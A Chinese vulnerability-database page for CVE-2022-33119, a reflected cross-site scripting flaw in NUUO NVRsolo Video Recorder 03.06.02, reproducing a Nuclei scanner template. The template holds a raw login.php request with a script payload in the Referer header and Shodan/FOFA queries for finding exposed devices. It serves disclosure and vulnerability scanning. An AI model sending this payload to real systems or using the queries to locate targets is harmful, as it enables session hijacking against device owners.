CVE-2022-33119: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: NUUO NVRsolo VideoRecorder | POC: 已公开

漏洞描述

NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.

PoC代码[已公开]

id: CVE-2022-33119

info:
  name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software.
  reference:
    - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-33119
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/badboycxcc/badboycxcc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-33119
    cwe-id: CWE-79
    epss-score: 0.02
    epss-percentile: 0.83005
    cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nuuo
    product: nvrsolo_firmware
    shodan-query:
      - http.html:"NVRsolo"
      - http.html:"nvrsolo"
    fofa-query: body="nvrsolo"
  tags: cve,cve2022,nvrsolo,xss,nuuo

http:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: "><script>alert(document.domain)</script><"

        language=en&user=user&pass=pass&submit=Login

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "text/html")'
          - 'status_code == 200'
          - contains(body,'<script>alert(document.domain)</script><\"?cmd=')
        condition: and
# digest: 490a0046304402203a9f0d655fcf25c81e89e06f8a146aab78a1a7fc654a6f8bff6b91f9e749ddc5022038d4885612f52ffad641d4a1ebae046878c650e1cbe589999d3b877cdb1b2d94:922c64590222798bb761d5b6d8e72950

相关漏洞推荐